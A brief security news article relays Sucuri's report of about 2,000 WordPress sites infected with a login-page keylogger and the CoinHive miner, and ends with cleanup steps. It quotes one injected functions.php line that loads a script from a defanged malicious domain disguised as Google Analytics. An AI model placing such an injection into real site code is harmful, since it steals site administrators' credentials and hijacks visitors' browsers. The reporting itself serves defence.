Security researchers from Sucuri have found that about 2,000 WordPress CMS websites are infected with a malicious script (keylogger) that’s running on the WordPress backend login page and a web browser cryptocurrency miner called CoinHive on their frontends.
The researchers said that the new attack is tied to a similar operation that took place in early December 2017 that infected over 5,500 WordPress websites. Both incidents used a keylogger and cryptocurrency malware named cloudflare[.]solutions. The name is obtained from the domain name used to serve up the malware in the first attack, cloudflare[.]solutions.
Cybercriminals inject these malicious scrips on WordPress CMS source code with weak or outdated security.
According to Sucuri researchers:
The cdjs[.]online script is injected into either a WordPress database (wp_posts table) or into the theme’s functions.php file, just like we saw in the former cloudflare[.]solutions attack. The cdns[.]ws and msdns[.]online scripts can also be found injected into the theme’s functions.php file:
"function chmnr_klgr_enqueue_script() {wp_enqueue_script( 'chmnr_klgr-js', 'hxxps://cdns[.]ws/lib/googleanalytics.js', false );"
The new campaigns do not yet seem to be as heavy as the first malware campaign, but there are many websites that have failed to correctly secure themselves after the original infection.
“To clean up a website that has been compromised with this infection, you’ll need to remove the malicious code from theme’s functions.php, scan wp_posts table for possible injections, change all WordPress passwords(!) and update all server software including third-party themes and plugins.”
